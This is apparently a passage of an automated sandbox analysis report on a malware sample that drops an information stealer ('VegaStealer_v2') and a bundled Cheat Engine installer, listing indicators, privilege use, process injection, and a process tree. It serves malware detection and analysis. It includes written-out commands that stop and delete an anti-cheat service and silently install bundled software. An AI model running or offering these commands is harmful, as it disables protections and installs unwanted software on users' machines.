7ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	saBSI.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4660	v2.exe
4660	v2.exe
4660	v2.exe
4660	v2.exe
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
3440	CheatEngine75.tmp
4492	3.exe
4492	3.exe
5116	powershell.exe
5116	powershell.exe
4492	3.exe
4492	3.exe
4492	3.exe
4492	3.exe
4492	3.exe
4492	3.exe
4720	powershell.exe
4720	powershell.exe
4492	3.exe
4492	3.exe
3936	powershell.exe
3936	powershell.exe
2416	updater.exe
2416	updater.exe
884	powershell.exe
884	powershell.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
1088	powershell.exe
1088	powershell.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
2416	updater.exe
3636	conhost.exe
3636	conhost.exe
2416	updater.exe
2416	updater.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
2380	conhost.exe
1372	saBSI.exe
1372	saBSI.exe
1372	saBSI.exe
1372	saBSI.exe
1372	saBSI.exe
1372	saBSI.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4660	v2.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeShutdownPrivilege	4448	powercfg.exe
Token: SeCreatePagefilePrivilege	4448	powercfg.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeShutdownPrivilege	3424	powercfg.exe
Token: SeCreatePagefilePrivilege	3424	powercfg.exe
Token: SeShutdownPrivilege	876	powercfg.exe
Token: SeCreatePagefilePrivilege	876	powercfg.exe
Token: SeShutdownPrivilege	2540	powercfg.exe
Token: SeCreatePagefilePrivilege	2540	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4720	powershell.exe
Token: SeSecurityPrivilege	4720	powershell.exe
Token: SeTakeOwnershipPrivilege	4720	powershell.exe
Token: SeLoadDriverPrivilege	4720	powershell.exe
Token: SeSystemProfilePrivilege	4720	powershell.exe
Token: SeSystemtimePrivilege	4720	powershell.exe
Token: SeProfSingleProcessPrivilege	4720	powershell.exe
Token: SeIncBasePriorityPrivilege	4720	powershell.exe
Token: SeCreatePagefilePrivilege	4720	powershell.exe
Token: SeBackupPrivilege	4720	powershell.exe
Token: SeRestorePrivilege	4720	powershell.exe
Token: SeShutdownPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeSystemEnvironmentPrivilege	4720	powershell.exe
Token: SeRemoteShutdownPrivilege	4720	powershell.exe
Token: SeUndockPrivilege	4720	powershell.exe
Token: SeManageVolumePrivilege	4720	powershell.exe
Token: 33	4720	powershell.exe
Token: 34	4720	powershell.exe
Token: 35	4720	powershell.exe
Token: 36	4720	powershell.exe
Token: SeIncreaseQuotaPrivilege	4720	powershell.exe
Token: SeSecurityPrivilege	4720	powershell.exe
Token: SeTakeOwnershipPrivilege	4720	powershell.exe
Token: SeLoadDriverPrivilege	4720	powershell.exe
Token: SeSystemProfilePrivilege	4720	powershell.exe
Token: SeSystemtimePrivilege	4720	powershell.exe
Token: SeProfSingleProcessPrivilege	4720	powershell.exe
Token: SeIncBasePriorityPrivilege	4720	powershell.exe
Token: SeCreatePagefilePrivilege	4720	powershell.exe
Token: SeBackupPrivilege	4720	powershell.exe
Token: SeRestorePrivilege	4720	powershell.exe
Token: SeShutdownPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeSystemEnvironmentPrivilege	4720	powershell.exe
Token: SeRemoteShutdownPrivilege	4720	powershell.exe
Token: SeUndockPrivilege	4720	powershell.exe
Token: SeManageVolumePrivilege	4720	powershell.exe
Token: 33	4720	powershell.exe
Token: 34	4720	powershell.exe
Token: 35	4720	powershell.exe
Token: 36	4720	powershell.exe
Token: SeIncreaseQuotaPrivilege	4720	powershell.exe
Token: SeSecurityPrivilege	4720	powershell.exe
Token: SeTakeOwnershipPrivilege	4720	powershell.exe
Token: SeLoadDriverPrivilege	4720	powershell.exe
Token: SeSystemProfilePrivilege	4720	powershell.exe
Token: SeSystemtimePrivilege	4720	powershell.exe
Token: SeProfSingleProcessPrivilege	4720	powershell.exe
Token: SeIncBasePriorityPrivilege	4720	powershell.exe
Token: SeCreatePagefilePrivilege	4720	powershell.exe
Token: SeBackupPrivilege	4720	powershell.exe
Token: SeRestorePrivilege	4720	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3440	CheatEngine75.tmp
2456	CheatEngine75.tmp
4332	WeatherZero.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4332	WeatherZero.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4592 wrote to memory of 4492	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	82
PID 4592 wrote to memory of 4492	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	82
PID 4592 wrote to memory of 4684	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	83
PID 4592 wrote to memory of 4684	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	83
PID 4592 wrote to memory of 4684	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	83
PID 4592 wrote to memory of 4916	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	84
PID 4592 wrote to memory of 4916	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	84
PID 4592 wrote to memory of 4916	4592	Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe	84
PID 4684 wrote to memory of 4660	4684	VegaStealer_v2.exe	85
PID 4684 wrote to memory of 4660	4684	VegaStealer_v2.exe	85
PID 4684 wrote to memory of 4660	4684	VegaStealer_v2.exe	85
PID 4916 wrote to memory of 3440	4916	CheatEngine75.exe	86
PID 4916 wrote to memory of 3440	4916	CheatEngine75.exe	86
PID 4916 wrote to memory of 3440	4916	CheatEngine75.exe	86
PID 1116 wrote to memory of 1712	1116	cmd.exe	99
PID 1116 wrote to memory of 1712	1116	cmd.exe	99
PID 3868 wrote to memory of 4448	3868	cmd.exe	100
PID 3868 wrote to memory of 4448	3868	cmd.exe	100
PID 1116 wrote to memory of 1568	1116	cmd.exe	101
PID 1116 wrote to memory of 1568	1116	cmd.exe	101
PID 1116 wrote to memory of 212	1116	cmd.exe	102
PID 1116 wrote to memory of 212	1116	cmd.exe	102
PID 3868 wrote to memory of 3424	3868	cmd.exe	103
PID 3868 wrote to memory of 3424	3868	cmd.exe	103
PID 1116 wrote to memory of 4812	1116	cmd.exe	104
PID 1116 wrote to memory of 4812	1116	cmd.exe	104
PID 3868 wrote to memory of 876	3868	cmd.exe	105
PID 3868 wrote to memory of 876	3868	cmd.exe	105
PID 1116 wrote to memory of 4160	1116	cmd.exe	106
PID 1116 wrote to memory of 4160	1116	cmd.exe	106
PID 1116 wrote to memory of 4456	1116	cmd.exe	107
PID 1116 wrote to memory of 4456	1116	cmd.exe	107
PID 3868 wrote to memory of 2540	3868	cmd.exe	108
PID 3868 wrote to memory of 2540	3868	cmd.exe	108
PID 1116 wrote to memory of 1936	1116	cmd.exe	109
PID 1116 wrote to memory of 1936	1116	cmd.exe	109
PID 1116 wrote to memory of 4316	1116	cmd.exe	110
PID 1116 wrote to memory of 4316	1116	cmd.exe	110
PID 1116 wrote to memory of 3604	1116	cmd.exe	111
PID 1116 wrote to memory of 3604	1116	cmd.exe	111
PID 1116 wrote to memory of 4772	1116	cmd.exe	112
PID 1116 wrote to memory of 4772	1116	cmd.exe	112
PID 3936 wrote to memory of 2264	3936	powershell.exe	115
PID 3936 wrote to memory of 2264	3936	powershell.exe	115
PID 1424 wrote to memory of 1564	1424	cmd.exe	123
PID 1424 wrote to memory of 1564	1424	cmd.exe	123
PID 5020 wrote to memory of 3216	5020	cmd.exe	124
PID 5020 wrote to memory of 3216	5020	cmd.exe	124
PID 1424 wrote to memory of 3680	1424	cmd.exe	125
PID 1424 wrote to memory of 3680	1424	cmd.exe	125
PID 1424 wrote to memory of 4208	1424	cmd.exe	126
PID 1424 wrote to memory of 4208	1424	cmd.exe	126
PID 1424 wrote to memory of 1816	1424	cmd.exe	127
PID 1424 wrote to memory of 1816	1424	cmd.exe	127
PID 5020 wrote to memory of 2256	5020	cmd.exe	128
PID 5020 wrote to memory of 2256	5020	cmd.exe	128
PID 1424 wrote to memory of 4960	1424	cmd.exe	129
PID 1424 wrote to memory of 4960	1424	cmd.exe	129
PID 1424 wrote to memory of 4616	1424	cmd.exe	131
PID 1424 wrote to memory of 4616	1424	cmd.exe	131
PID 1424 wrote to memory of 1296	1424	cmd.exe	132
PID 1424 wrote to memory of 1296	1424	cmd.exe	132
PID 5020 wrote to memory of 3008	5020	cmd.exe	133
PID 5020 wrote to memory of 3008	5020	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3404
- C:\Users\Admin\AppData\Local\Temp\Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe
  "C:\Users\Admin\AppData\Local\Temp\Sigmanly_9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4492
- - C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
    "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Users\Admin\AppData\Local\Temp\v2.exe
      "C:\Users\Admin\AppData\Local\Temp\v2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4660
- - C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
    "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\is-MP83I.tmp\CheatEngine75.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MP83I.tmp\CheatEngine75.tmp" /SL5="$F02A4,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:3440
    - - C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod0_extract\saBSI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod0_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:1372
      - C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod0_extract\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod0_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4208
        
        C:\Program Files\McAfee\Temp3727718660\installer.exe
        
        "C:\Program Files\McAfee\Temp3727718660\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Modifies registry class
        
        PID:4908
    - - C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod1_extract\OperaSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod1_extract\OperaSetup.exe" --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4400
      - C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a --server-tracking-blob=NDg5MmM0M2NiZmYxOTc2MjY3ZDE3MGIyMzA3NGYyODVjNDZhOGNmNjg5YTA1ZDg5NTRhNThiN2MxZWIzZDk4OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInRpbWVzdGFtcCI6IjE3MzUwMzgwMTIuNzc0NSIsInVzZXJhZ2VudCI6InB5dGhvbi1yZXF1ZXN0cy8yLjMyLjMiLCJ1dG0iOnt9LCJ1dWlkIjoiYWFmNjZmNDQtNWMyYy00ZmJmLTg0YmQtN2Y2OTE0MGY0MGRiIn0=
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x32c,0x330,0x334,0x328,0x338,0x724d9d44,0x724d9d50,0x724d9d5c
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:32
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4176 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20250105100805" --session-guid=8d5a21ce-c23b-4bbd-8ce9-3f55275f5221 --server-tracking-blob="NGEwNTZiMGVmZmM1MmRlYjUzNmQyNjkwMGU1OTc5ODUyN2U4ZjAwYTBlNDQ0NTQ4ZTA2NDk3ODQ2MmNmNjI5NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczNTAzODAxMi43NzQ1IiwidXNlcmFnZW50IjoicHl0aG9uLXJlcXVlc3RzLzIuMzIuMyIsInV0bSI6eyJjYW1wYWlnbiI6Im9wZXJhX25ld19hIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiYWlzIn0sInV1aWQiOiJhYWY2NmY0NC01YzJjLTRmYmYtODRiZC03ZjY5MTQwZjQwZGIifQ== " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=BC04000000000000
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS031E6C68\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x71349d44,0x71349d50,0x71349d5c
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\assistant_installer.exe" --version
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202501051008051\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x220,0x224,0x228,0xb0,0x22c,0x9a17a0,0x9a17ac,0x9a17b8
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1668
    - - C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod2_extract\WZSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\prod2_extract\WZSetup.exe" /S /tpchannelid=1571 /distid=App123
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3880
      - C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
        
        "C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" install
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1884
      - C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
        
        "C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" start silent
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4884
    - - C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\CheatEngine75.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3216
      - C:\Users\Admin\AppData\Local\Temp\is-SV697.tmp\CheatEngine75.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SV697.tmp\CheatEngine75.tmp" /SL5="$2015C,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-OH97D.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2456
        
        C:\Windows\SYSTEM32\net.exe
        
        "net" stop BadlionAntic
        7⤵
        
        PID:1932
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop BadlionAntic
        8⤵
        
        PID:3844
        
        C:\Windows\SYSTEM32\net.exe
        
        "net" stop BadlionAnticheat
        7⤵
        
        PID:3416
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop BadlionAnticheat
        8⤵
        
        PID:2120
        
        C:\Windows\SYSTEM32\sc.exe
        
        "sc" delete BadlionAntic
        7⤵
        Launches sc.exe
        
        PID:2304
        
        C:\Windows\SYSTEM32\sc.exe
        
        "sc" delete BadlionAnticheat
        7⤵
